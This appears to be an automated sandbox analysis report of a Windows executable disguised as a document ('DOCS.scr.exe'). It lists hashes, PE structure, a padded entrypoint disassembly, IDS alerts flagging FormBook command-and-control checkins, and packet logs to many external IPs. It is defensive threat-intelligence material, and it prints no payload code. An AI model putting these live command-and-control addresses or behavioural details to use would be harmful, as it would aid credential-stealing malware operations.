                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.956043063468761
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:PASU5160894680 DOCS.scr.exe
                                                              File size:730'112 bytes
                                                              MD5:6e3e35e593690a43c0fabe9ec9367b67
                                                              SHA1:8f9ed06b7b4d0d3c9b4f34ec66919482abacb7f4
                                                              SHA256:6cc54bd57057a1fc07c2726c351a42f47caef4ae05a2693fbf6b9f693c6761c6
                                                              SHA512:eaa34391eb4097e78c6697add4e239c9a46f78a16ec310a9ba7b42151f5ebade044af449c62658c26fc71aa95362de839ca31153241c08db543544e3320307ab
                                                              SSDEEP:12288:Mn7kvDoQtuCbYItzDzrcP97HCWIfyPVB5WPjuyq6jJMYnJVPJUhGAF0M+d:MnoJfkc7rcM9f4WKUMYJxiM
                                                              TLSH:90F42304B6BC6B61E9BA07FA056082503371B563D562EB8C1ED271DF1FF278897A1E43
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......4........... ... ....@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:0ef7966b49af2fae

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4b0de6
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66E0E7A6 [Wed Sep 11 00:43:18 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb0d940x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x3200.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xaedec0xaee00a9028e7d8e8ace1dbf0c5b8f17a7567aFalse0.9559492829699786data7.961122101465982IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xb20000x32000x3200f4995c5ec5ef5caa151cdeb48b4fec92False0.92625data7.768458498465549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xb60000xc0x2002e7ea00587cbc8cdf7de247af37aaebcFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xb21000x2ba6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9886343296939324
                                                              RT_GROUP_ICON0xb4cb80x14data1.05
                                                              RT_VERSION0xb4cdc0x324data0.43159203980099503
                                                              RT_MANIFEST0xb50100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-09-12T15:05:02.912694+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497903.33.130.19080TCP
                                                              2024-09-12T15:05:31.657380+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974143.135.99.2180TCP
                                                              2024-09-12T15:05:47.701508+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974279.125.89.8380TCP
                                                              2024-09-12T15:05:49.944323+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974379.125.89.8380TCP
                                                              2024-09-12T15:05:52.578611+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974479.125.89.8380TCP
                                                              2024-09-12T15:05:55.206008+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974579.125.89.8380TCP
                                                              2024-09-12T15:06:01.558052+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449747160.251.148.11580TCP
                                                              2024-09-12T15:06:04.084737+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449748160.251.148.11580TCP
                                                              2024-09-12T15:06:06.832873+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449749160.251.148.11580TCP
                                                              2024-09-12T15:06:09.188031+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449750160.251.148.11580TCP
                                                              2024-09-12T15:06:14.682539+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497513.33.130.19080TCP
                                                              2024-09-12T15:06:17.225496+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497523.33.130.19080TCP
                                                              2024-09-12T15:06:19.790824+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497533.33.130.19080TCP
                                                              2024-09-12T15:06:22.322097+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497543.33.130.19080TCP
                                                              2024-09-12T15:06:28.382906+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449755203.161.43.22880TCP
                                                              2024-09-12T15:06:30.954941+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756203.161.43.22880TCP
                                                              2024-09-12T15:06:33.601631+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449757203.161.43.22880TCP
                                                              2024-09-12T15:06:36.197853+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449758203.161.43.22880TCP
                                                              2024-09-12T15:06:43.007045+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497593.33.130.19080TCP
                                                              2024-09-12T15:06:44.485859+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497603.33.130.19080TCP
                                                              2024-09-12T15:06:47.036755+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497613.33.130.19080TCP
                                                              2024-09-12T15:06:49.594348+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497623.33.130.19080TCP
                                                              2024-09-12T15:06:55.291039+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449763185.199.108.15380TCP
                                                              2024-09-12T15:06:57.638304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449764185.199.108.15380TCP
                                                              2024-09-12T15:07:00.202554+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449765185.199.108.15380TCP
                                                              2024-09-12T15:07:02.761171+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449766185.199.108.15380TCP
                                                              2024-09-12T15:07:18.984871+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976791.184.0.20080TCP
                                                              2024-09-12T15:07:21.647591+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976891.184.0.20080TCP
                                                              2024-09-12T15:07:24.253464+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976991.184.0.20080TCP
                                                              2024-09-12T15:07:26.677164+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44977091.184.0.20080TCP
                                                              2024-09-12T15:07:32.867699+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449771154.23.176.19780TCP
                                                              2024-09-12T15:07:35.362763+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449772154.23.176.19780TCP
                                                              2024-09-12T15:07:38.183068+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449773154.23.176.19780TCP
                                                              2024-09-12T15:07:40.502677+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449774154.23.176.19780TCP
                                                              2024-09-12T15:07:47.152302+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977545.113.201.7780TCP
                                                              2024-09-12T15:07:49.683729+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977645.113.201.7780TCP
                                                              2024-09-12T15:07:52.206347+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977745.113.201.7780TCP
                                                              2024-09-12T15:07:55.526268+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44977845.113.201.7780TCP
                                                              2024-09-12T15:08:01.064027+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977976.223.113.16180TCP
                                                              2024-09-12T15:08:03.599426+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978076.223.113.16180TCP
                                                              2024-09-12T15:08:06.213488+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978176.223.113.16180TCP
                                                              2024-09-12T15:08:08.786856+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978276.223.113.16180TCP
                                                              2024-09-12T15:08:22.883446+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978384.32.84.3780TCP
                                                              2024-09-12T15:08:25.443626+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978484.32.84.3780TCP
                                                              2024-09-12T15:08:27.981899+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978584.32.84.3780TCP
                                                              2024-09-12T15:08:30.549061+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978684.32.84.3780TCP
                                                              2024-09-12T15:08:36.171879+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497873.33.130.19080TCP
                                                              2024-09-12T15:08:38.741159+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497883.33.130.19080TCP
                                                              2024-09-12T15:08:42.214171+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497893.33.130.19080TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 12, 2024 15:05:30.769248009 CEST4974180192.168.2.443.135.99.21
                                                              Sep 12, 2024 15:05:30.774234056 CEST804974143.135.99.21192.168.2.4
                                                              Sep 12, 2024 15:05:30.774389029 CEST4974180192.168.2.443.135.99.21
                                                              Sep 12, 2024 15:05:30.788381100 CEST4974180192.168.2.443.135.99.21
                                                              Sep 12, 2024 15:05:30.793983936 CEST804974143.135.99.21192.168.2.4
                                                              Sep 12, 2024 15:05:31.654726028 CEST804974143.135.99.21192.168.2.4
                                                              Sep 12, 2024 15:05:31.657227039 CEST804974143.135.99.21192.168.2.4
                                                              Sep 12, 2024 15:05:31.657380104 CEST4974180192.168.2.443.135.99.21
                                                              Sep 12, 2024 15:05:31.658724070 CEST4974180192.168.2.443.135.99.21
                                                              Sep 12, 2024 15:05:31.664450884 CEST804974143.135.99.21192.168.2.4
                                                              Sep 12, 2024 15:05:46.738044024 CEST4974280192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:46.743120909 CEST804974279.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:46.743208885 CEST4974280192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:46.756665945 CEST4974280192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:46.761567116 CEST804974279.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:47.701035023 CEST804974279.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:47.701307058 CEST804974279.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:47.701317072 CEST804974279.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:47.701508045 CEST4974280192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:47.701590061 CEST804974279.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:47.701634884 CEST4974280192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:48.275643110 CEST4974280192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:49.294416904 CEST4974380192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:49.300297022 CEST804974379.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:49.300417900 CEST4974380192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:49.319444895 CEST4974380192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:49.324690104 CEST804974379.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:49.943836927 CEST804974379.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:49.944250107 CEST804974379.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:49.944323063 CEST4974380192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:50.834902048 CEST4974380192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:51.853961945 CEST4974480192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:51.859164000 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.859328032 CEST4974480192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:51.871735096 CEST4974480192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:51.876894951 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.876913071 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.876924992 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.876981020 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.876991034 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.877032042 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.877072096 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.877166986 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:51.877183914 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:52.576183081 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:52.578493118 CEST804974479.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:52.578610897 CEST4974480192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:53.381675959 CEST4974480192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:54.400867939 CEST4974580192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:54.573700905 CEST804974579.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:54.573815107 CEST4974580192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:54.581515074 CEST4974580192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:54.586628914 CEST804974579.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:55.205617905 CEST804974579.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:55.205786943 CEST804974579.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:05:55.206007957 CEST4974580192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:55.210577965 CEST4974580192.168.2.479.125.89.83
                                                              Sep 12, 2024 15:05:55.215498924 CEST804974579.125.89.83192.168.2.4
                                                              Sep 12, 2024 15:06:00.726280928 CEST4974780192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:00.731182098 CEST8049747160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:00.731364012 CEST4974780192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:00.747618914 CEST4974780192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:00.756361961 CEST8049747160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:01.557938099 CEST8049747160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:01.557965040 CEST8049747160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:01.558052063 CEST4974780192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:02.256835938 CEST4974780192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:03.276019096 CEST4974880192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:03.281519890 CEST8049748160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:03.281672955 CEST4974880192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:03.292758942 CEST4974880192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:03.297832966 CEST8049748160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:04.084152937 CEST8049748160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:04.084606886 CEST8049748160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:04.084737062 CEST4974880192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:04.803632021 CEST4974880192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:05.822854996 CEST4974980192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:05.828047991 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.828213930 CEST4974980192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:05.844846010 CEST4974980192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:05.849898100 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.849936008 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.849950075 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.849980116 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.849992037 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.850002050 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.850090027 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.850100040 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:05.850107908 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:06.832684994 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:06.832830906 CEST8049749160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:06.832873106 CEST4974980192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:07.350486994 CEST4974980192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:08.369668961 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:08.374665976 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:08.374794006 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:08.382653952 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:08.387665987 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:09.187525988 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:09.187980890 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:09.188030958 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:09.190373898 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:09.195274115 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:14.215421915 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:14.220478058 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:14.220587969 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:14.231529951 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:14.236557961 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:14.682461977 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:14.682538986 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:15.741221905 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:15.747694969 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:16.761086941 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:16.766371012 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:16.766506910 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:16.786643982 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:16.791783094 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:17.225414991 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:17.225496054 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:18.288062096 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:18.293126106 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.308552980 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:19.313868046 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.314018011 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:19.327594995 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:19.332693100 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332743883 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332756042 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332782030 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332848072 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333096981 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333111048 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333122969 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333133936 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.790730953 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.790823936 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:20.834836006 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:20.840006113 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:21.854376078 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:21.859500885 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:21.859602928 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:21.866998911 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:21.872330904 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:22.321814060 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:22.322020054 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:22.322097063 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:22.324879885 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:22.330367088 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:27.784475088 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:27.789442062 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:27.789532900 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:27.802988052 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:27.807946920 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:28.382606030 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:28.382797003 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:28.382905960 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:29.319169044 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.340261936 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.346201897 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.346271038 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.358347893 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.363336086 CEST8049756203.161.43.228192.168.2.4
